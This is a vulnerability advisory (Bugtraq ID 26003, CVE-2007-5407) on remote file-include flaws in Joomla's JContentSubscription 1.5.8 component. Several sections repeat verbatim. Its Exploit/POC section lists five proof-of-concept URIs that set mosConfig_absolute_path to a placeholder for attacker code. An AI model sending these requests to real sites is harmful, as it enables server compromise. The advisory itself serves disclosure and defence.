Joomla! JContentSubscription MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
BID:26003
Info
Joomla! JContentSubscription MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 26003 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5407 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 10 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | NoGe is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Joomla Equipment JContentSubscription 1.5.8 |
| Not Vulnerable: | |
Discussion
Joomla! JContentSubscription MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
JContentSubscription is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying webserver; other attacks are also possible.
These issues affect JContentSubscription 1.5.8; other versions may also be vulnerable.
JContentSubscription is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying webserver; other attacks are also possible.
These issues affect JContentSubscription 1.5.8; other versions may also be vulnerable.
Exploit / POC
Joomla! JContentSubscription MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=[evilcode]
http://www.example.com/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=[evilcode]
http://www.example.com/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=[evilcode]
http://www.example.com/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=[evilcode]
http://www.example.com/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=[evilcode]
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=[evilcode]
http://www.example.com/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=[evilcode]
http://www.example.com/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=[evilcode]
http://www.example.com/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=[evilcode]
http://www.example.com/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=[evilcode]
Solution / Fix
Joomla! JContentSubscription MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Joomla! JContentSubscription MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
References:
References:
- Joomla! Homepage (Joomla )
- Vendor Homepage (Joomla Equipment)